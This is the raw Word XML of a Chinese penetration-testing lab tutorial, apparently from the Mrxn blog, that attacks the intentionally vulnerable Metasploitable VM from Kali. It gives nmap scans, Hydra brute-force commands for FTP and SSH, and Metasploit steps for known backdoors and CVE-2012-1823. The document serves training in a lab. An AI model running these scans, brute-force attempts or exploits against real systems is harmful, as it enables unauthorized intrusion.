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5F4">
    <v:background id="矩形 0">
      <v:fill on="f" color2="#FFFFFF" focus="0%" rotate="t"/>
    </v:background>
  </w:background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</w:rPr>
        <w:t>Kali渗透测试演练Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>靶机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准备工作：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VM虚拟机（http://www.vmware.com/cn.html）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Kali（https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/）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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Metasploitable靶机（https://sourceforge.net/projects/metasploitable/）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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要求Kali和靶机在同一个Lan段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在开始工作前都确认一一下是否在同一个Lan段，分别登录Kali和靶机使用ifconfig 命令查看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注意：Metasploitable的默认账号、密码是：msfadmin:msfadmin，Kali的默认是root:toor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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" o:spid="_x0000_s1028" type="#_x0000_t75" style="height:241.65pt;width:431.4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" o:spid="_x0000_s1029" type="#_x0000_t75" style="height:203.3pt;width:431.9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 xml:space="preserve">第一阶段：扫描阶段，工具 namp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命令：隐蔽扫描：nmap -sS 192.168.209.138</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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3" o:spid="_x0000_s1030" type="#_x0000_t75" style="height:376.75pt;width:431.9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端口爆破：FTP、SSH等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工具：Hydra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备用字典：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6" o:spid="_x0000_s1031" type="#_x0000_t75" style="height:96.75pt;width:31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爆破FTP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hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt ftp://192.168.209.138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7" o:spid="_x0000_s1032" type="#_x0000_t75" style="height:171.65pt;width:431.8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爆破ssh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hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt 192.168.209.138 ssh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8" o:spid="_x0000_s1033" type="#_x0000_t75" style="height:139.5pt;width:431.9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br/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通过23端口telnet登录进系统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9" o:spid="_x0000_s1034" type="#_x0000_t75" style="height:359.95pt;width:431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br/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0" o:spid="_x0000_s1035" type="#_x0000_t75" style="height:82.5pt;width:427.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1" o:spid="_x0000_s1036" type="#_x0000_t75" style="height:235.5pt;width:431.9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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下面进行演示常见端口的测试：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="9"/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>注：因为漏洞的利用需要使用Metasploit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因此我们需要先启动他，在此稍作说明，免得有些小白想玩的说下面的命令怎么没反应-_-|| ,Metasploit 使用PostgreSQL作为数据库，所以必须先运行它,使用如下命令运行：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service postgresql start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2" o:spid="_x0000_s1037" type="#_x0000_t75" style="height:44.95pt;width:431.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可以用 ss -ant  的输出来检验PostgreSQL是否在运行，然后确认5432端口处于listening状态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3" o:spid="_x0000_s1038" type="#_x0000_t75" style="height:60.1pt;width:431.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启动Kali的Metasploit服务：随着PostgreSQL的启动和运行，接着我们要运行Metasploit服务。第一次运行服务会创建一个msf3数据库用户和一个叫msf3的数据库。还会运行Metasploit RPC和它需要的WEB 服务端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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4" o:spid="_x0000_s1039" type="#_x0000_t75" style="height:77.25pt;width:432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  <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在Kali运行msfconsole：现在PostgreSQL 和 Metasploit服务都运行了，可以运行 msfconsole，然后用 db_status 命令检验数据库的连通性。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直接使用msfconsole 来运行它：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5" o:spid="_x0000_s1040" type="#_x0000_t75" style="height:31.95pt;width:431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就等待Metasploit 框架运行吧。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6" o:spid="_x0000_s1041" type="#_x0000_t75" style="height:410.5pt;width:431.95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7" o:spid="_x0000_s1042" type="#_x0000_t75" style="height:179.15pt;width:431.8pt;rotation:0f;" o:ole="f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18" o:spid="_x0000_s1043" type="#_x0000_t75" style="height:307.5pt;width:431.8pt;rotation:0f;" o:ole="f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它会显示有多少个exp、payload等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6667——-irc_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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2" o:spid="_x0000_s1044" type="#_x0000_t75" style="height:206.2pt;width:431.35pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId2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成功获取会话，root权限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3" o:spid="_x0000_s1045" type="#_x0000_t75" style="height:169.55pt;width:43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4" o:spid="_x0000_s1046" type="#_x0000_t75" style="height:173.6pt;width:431.35pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId2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6200——-vsftpd_234_backdoor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5" o:spid="_x0000_s1047" type="#_x0000_t75" style="height:219.05pt;width:431.6pt;rotation:0f;" o:ole="f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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹会话，root权限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6" o:spid="_x0000_s1048" type="#_x0000_t75" style="height:134.3pt;width:431.7pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId2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1524——-ingrelock_backdoor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利用telnet连接1524，直接返回root会话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7" o:spid="_x0000_s1049" type="#_x0000_t75" style="height:140.15pt;width:431.85pt;rotation:0f;" o:ole="f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  <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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</w:rPr>
        <w:t>1099——-distcc程序漏洞—-ingrelock</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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8" o:spid="_x0000_s1050" type="#_x0000_t75" style="height:279.2pt;width:431.45pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId2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ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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9" o:spid="_x0000_s1051" type="#_x0000_t75" style="height:195.55pt;width:431.3pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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ind w:leftChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>139——-samba为3.0漏洞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</w:rPr>
        <w:t>先用nmap进行详细扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap -v -A -T4 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8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30" o:spid="_x0000_s1052" type="#_x0000_t75" style="height:245.9pt;width:431.95pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Samba 3.0.20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利用metasploit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31" o:spid="_x0000_s1053" type="#_x0000_t75" style="height:218.7pt;width:43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3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35" o:spid="_x0000_s1054" type="#_x0000_t75" style="height:231.95pt;width:432pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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8180——-Apache Tomcat弱口令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36" o:spid="_x0000_s1055" type="#_x0000_t75" style="height:323.15pt;width:431.9pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破，用默认自带的字典即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/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br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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80——-PHP CGI参数注入执行漏洞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msf &gt; search cve:2012-1823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msf &gt; use exploit/multi/http/php_cgi_arg_injection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msf exploit(php_cgi_arg_injection) &gt; show options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msf exploit(php_cgi_arg_injection) &gt; set rhost 192.168.209.138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rhost =&gt; 192.168.209.138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msf exploit(php_cgi_arg_injection) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="left"/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0" o:spid="_x0000_s1056" type="#_x0000_t75" style="height:95.85pt;width:431.85pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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  <w:r>
        <w:br/>
      </w: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21" o:spid="_x0000_s1057" type="#_x0000_t75" style="height:265.3pt;width:431.35pt;rotation:0f;" o:ole="f" fillcolor="#FFFFFF" filled="f" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600">
            <v:fill on="f" color2="#FFFFFF" focus="0%"/>
            <v:imagedata gain="65536f" blacklevel="0f" gamma="0" o:title="" r:id="rId3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/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId4" w:type="default"/>
      <w:footerReference r:id="rId5" w:type="default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34" o:spid="_x0000_s1025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PowerPlusWaterMarkObject1910275368" o:spid="_x0000_s1026" type="#_x0000_t136" style="position:absolute;left:0;height:60.35pt;width:404.45pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin;rotation:20643840f;z-index:-251658240;" o:ole="f" fillcolor="#C0C0C0" filled="t" o:preferrelative="t" stroked="f" coordorigin="0,0" coordsize="21600,21600" adj="10800">
          <v:fill opacity="79%" focus="0%"/>
          <v:imagedata gain="65536f" blacklevel="0f" gamma="0"/>
          <o:lock v:ext="edit" position="f" selection="f" grouping="f" rotation="f" cropping="f" text="f" aspectratio="t"/>
          <v:textpath on="t" fitpath="t" trim="t" xscale="f" string="www.mrxn.net原创" style="v-text-align:center;font-family:微软雅黑;font-size:60pt;"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>www.mrxn.net原创出品 ,欢迎访问Mrxn</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>’</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
      </w:rPr>
      <w:t>s Blog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3772528">
    <w:nsid w:val="58709270"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="58709270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4837725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011144"/>
    <w:rsid w:val="00182236"/>
    <w:rsid w:val="00A34398"/>
    <w:rsid w:val="051C0CEF"/>
    <w:rsid w:val="0D0A5F71"/>
    <w:rsid w:val="110732FE"/>
    <w:rsid w:val="11CE52C6"/>
    <w:rsid w:val="162470DF"/>
    <w:rsid w:val="16815279"/>
    <w:rsid w:val="189F55F4"/>
    <w:rsid w:val="1BA52068"/>
    <w:rsid w:val="1D441B15"/>
    <w:rsid w:val="24696049"/>
    <w:rsid w:val="2B5A68AC"/>
    <w:rsid w:val="2B7661DC"/>
    <w:rsid w:val="2E303E57"/>
    <w:rsid w:val="2F9F1AAF"/>
    <w:rsid w:val="31453464"/>
    <w:rsid w:val="31ED4B77"/>
    <w:rsid w:val="32254CD1"/>
    <w:rsid w:val="32E93B15"/>
    <w:rsid w:val="375A305F"/>
    <w:rsid w:val="42004FD7"/>
    <w:rsid w:val="423C15B9"/>
    <w:rsid w:val="42B42CEF"/>
    <w:rsid w:val="4AD56CD4"/>
    <w:rsid w:val="4E776E4B"/>
    <w:rsid w:val="51B6149B"/>
    <w:rsid w:val="52EB3A96"/>
    <w:rsid w:val="57D65228"/>
    <w:rsid w:val="589D71F0"/>
    <w:rsid w:val="5D4F1722"/>
    <w:rsid w:val="5DC44F64"/>
    <w:rsid w:val="60A4759A"/>
    <w:rsid w:val="626E2089"/>
    <w:rsid w:val="63960BF2"/>
    <w:rsid w:val="63B401A2"/>
    <w:rsid w:val="646E2E54"/>
    <w:rsid w:val="65204E75"/>
    <w:rsid w:val="665761F7"/>
    <w:rsid w:val="67F14C93"/>
    <w:rsid w:val="6A790E3A"/>
    <w:rsid w:val="6F8A028E"/>
    <w:rsid w:val="72016718"/>
    <w:rsid w:val="79F0361A"/>
    <w:rsid w:val="7ACF0A8A"/>
    <w:rsid w:val="7C556308"/>
    <w:rsid w:val="7D027725"/>
    <w:rsid w:val="7FF7647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unhideWhenUsed/>
    <w:uiPriority w:val="0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9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settings" Target="setting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tyles" Target="style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2017-01-07T06:56:00Z</dcterms:created>
  <cp:lastModifiedBy>Mrxn</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-27T08:02:22Z</dcterms:modified>
  <dc:title>Kali渗透测试演练Metasploitable靶机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